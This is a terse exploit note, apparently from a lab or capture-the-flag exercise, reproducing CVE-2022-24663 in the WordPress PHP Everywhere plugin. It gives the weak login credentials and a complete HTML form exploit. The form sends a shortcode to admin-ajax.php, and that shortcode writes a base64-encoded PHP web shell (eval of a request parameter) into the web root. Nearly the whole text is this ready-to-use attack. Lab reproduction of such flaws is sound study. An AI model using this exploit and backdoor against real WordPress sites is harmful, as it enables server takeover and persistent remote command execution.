CVE-2022-24663

  1. 访问后台/wp-login.php
  2. 弱口令 test test
  3. 【春秋云境】 CVE-2022-24663复现-CSDN博客
  4. exp
     <form
      action="http://eci-2ze8cyytdtrkar5l6kyn.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
      method="post"
    >
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea
      >
      <input type="submit" value="Execute" />
    </form>